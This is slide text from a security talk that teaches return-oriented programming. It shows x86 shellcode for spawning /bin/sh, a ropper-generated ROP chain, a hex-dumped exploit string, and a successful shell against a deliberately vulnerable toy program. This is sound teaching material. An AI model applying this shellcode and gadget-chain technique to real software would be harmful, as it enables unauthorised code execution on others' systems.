  • 27. 27 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
  • 28. 28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
  • 29. 29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 30. 30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xor ebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
  • 31. 31 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 32. 32 TurtleSec @pati_gallardo 1. int main(void) { 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
  • 33. 33 TurtleSec @pati_gallardo $ clang -m32 -o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
  • 34. 34 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 36. 36 TurtleSec @pati_gallardo Foundational idea: The ret instruction transfers execution to the (return) address located on the stack
  • 37. 37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stack ptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
  • 38. 38 TurtleSec @pati_gallardo Rest of Rop Chain Return address Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
  • 39. 39 TurtleSec @pati_gallardo Put it all into the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
  • 40. 40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2. from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
  • 41. 41 TurtleSec Terminal $ ropper --file target --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
  • 42. 42 Terminal TurtleSec #!/usr/bin/env python # Generated by ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 9f9eeaf6c92b653457587a35c043cfdf6b44ccaf270e2fe12ab8bfdb12dc04af rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain Addresses in rebase_0 calls are offsets from the IMAGE_BASE_0 address
  • 43. 43 Terminal TurtleSec rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += '//bi' rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc060) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc064) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000e094) # 0x08056094: xor eax, eax; ret; rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x00017fdc) # 0x0805ffdc: mov dword ptr [edx], eax; ret; rop += rebase_0(0x00001022) # 0x08049022: pop ebx; ret; rop += rebase_0(0x001cc060) rop += rebase_0(0x00004ddb) # 0x0804cddb: pop ecx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x00003a02) # 0x0804ba02: pop edx; ret; rop += rebase_0(0x001cc068) rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000e075b) # 0x0812875b: neg eax; ret; rop += rebase_0(0x00113650) # 0x0815b650: int 0x80; ret; The ROP Chain 1 2 3 4 6 8 5 7
  • 44. 44 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 6. 0x00004ddb 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
  • 45. 45 TurtleSec @pati_gallardo 0x000af97a 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x00017fdc 0x001cc060 0x00003a02 '//bi' 0x000af97a eax ebx ecx edx stack ptr '//bi' stack ptr 0x001cc060 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x000af97a 0x00003a02 0x00017fdc Stack
  • 46. 46 TurtleSec @pati_gallardo 0x000af97a 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x00017fdc 0x001cc064 0x00003a02 'n/sh' 0x000af97a eax ebx ecx edx stack ptr 'n/sh' stack ptr 0x001cc064 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x000af97a 0x00003a02 0x00017fdc 'n/sh' Stack
  • 47. 47 TurtleSec @pati_gallardo 0x0000e094 0x00003a02 0x00017fdc pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x00017fdc 0x001cc068 0x00003a02 0x0000e094 eax ebx ecx edx stack ptr 0x00000000 stack ptr 0x001cc068 stack ptr 0x001cc060 0x001cc064 0x001cc068 '//bi' Registers RW Memory RX Memory Instruction ptr 0x0000e094 0x00003a02 0x00017fdc 'n/sh' 0x00000000 Stack
  • 48. 48 TurtleSec @pati_gallardo 0x00001022 0x00004ddb 0x00003a02 0x000af97a 0x000e075b eax ebx ecx edx stack ptr stack ptr stack ptr Stack Registers RX Memory Instruction ptr 0x00001022 0x00004ddb 0x00003a02 pop ebx; ret; pop ecx; ret; pop edx; ret; pop eax; ret; neg eax; ret; 0x001cc068 0x001cc068 stack ptr 0x000af97a 0xfffffff5 stack ptr 0x000e075b 0x001cc060 0x0b 0x000e075b 0xfffffff5 0x000af97a 0x001cc068 0x00003a02 0x001cc068 0x00004ddb 0x00001022 0x001cc060 0x001cc060 0x001cc064 0x001cc068 '//bi' RW Memory 'n/sh' 0x00000000
  • 49. 49 TurtleSec @pati_gallardo 0x00113650 0x00113650 eax ebx ecx edx stack ptr Stack Registers RX Memory Instruction ptr 0x00113650 int 0x80; ret; 0x00000000 0x001cc068 0x001cc068 0xfffffff5 0x001cc060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv 0x001cc060 0x001cc064 0x001cc068 '//bi' RW Memory 'n/sh' 0x00000000
  • 52. 52 TurtleSec @pati_gallardo 1. 0x000af97a 7. 0x000e075b 8. 0x00113650 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000af97a) # 0x080f797a: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000e075b) # 0x0812875b: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113650) # 0x0815b650: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
  • 53. 53 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
  • 54. 54 TurtleSec @pati_gallardo 1. 0x000af97a 2. 0x00003a02 3. 0x00017fdc 4. 0x0000e094 5. 0x00001022 6. 0x00004ddb 7. 0x000e075b 8. 0x00113650 pop edx; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
  • 55. 55 TurtleSec @pati_gallardo Missing 3 gadgets xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
  • 56. 56 Terminal TurtleSec $ ropper --file target --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x080fa6c2: xor ebx, ebx; lea esi, [esi]; mov eax, edx; int 0x80; 0x080eef78: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0816ae61: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5cf40]; call dword ptr gs:[0x10]; 0x08078c0d: xor ebx, ebx; push esi; call dword ptr [eax + 0x24]; 0x0804cded: xor ebx, ebx; ret;
  • 57. 57 TurtleSec @pati_gallardo All 3 are present in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cded 0x0804ce00 0x0804ce13 Absolute address 0x00004ded 0x00004e00 0x00004e13 Relative address
  • 58. 58 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 59. 59 Terminal TurtleSec $ ./rop_chain_file.py > rop_chain_file $ xxd -g 4 rop_chain_file 00000000: 90909090 90909090 90909090 90909090 ................ 00000010: 90909090 90909090 90909090 90909090 ................ 00000020: 90909090 90909090 90909090 90909090 ................ 00000030: 90909090 90909090 90909090 90909090 ................ 00000040: 90909090 90909090 90909090 90909090 ................ 00000050: 90909090 90909090 90909090 90909090 ................ 00000060: 90909090 90909090 90909090 90909090 ................ 00000070: 90909090 90909090 90909090 90909090 ................ 00000080: 9090edcd 04087a79 0f08faff ffff5b87 ......zy......[. 00000090: 120850b6 15087a79 0f082f64 657602ba ..P...zy../dev.. 000000a0: 04086040 2108dcff 05087a79 0f082f74 ..`@!.....zy../t 000000b0: 747902ba 04086440 2108dcff 05089460 ty....d@!......` 000000c0: 050802ba 04086840 2108dcff 05082290 ......h@!.....". 000000d0: 04086040 210800ce 040813ce 04087a79 ..`@!.........zy 000000e0: 0f08fbff ffff5b87 120850b6 15087a79 ......[...P...zy 000000f0: 0f082f2f 626902ba 04086040 2108dcff ..//bi....`@!... 00000100: 05087a79 0f086e2f 736802ba 04086440 ..zy..n/sh....d@ 00000110: 2108dcff 05089460 050802ba 04086840 !......`......h@ 00000120: 2108dcff 05082290 04086040 2108dbcd !....."...`@!... 00000130: 04086840 210802ba 04086840 21087a79 ..h@!.....h@!.zy 00000140: 0f08f5ff ffff5b87 120850b6 15080a ......[...P.... Write the ROP string to file and have a look at it
  • 60. 60 $ hello Terminal TurtleSec $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < rop_chain_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 22820 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain
  • 62. 62 Turtle Sec @pati_gallardo I'm "sorry" <3 If this is totally your jam, join my 2-day training at NDC Security January 8th and 9th in Oslo 😈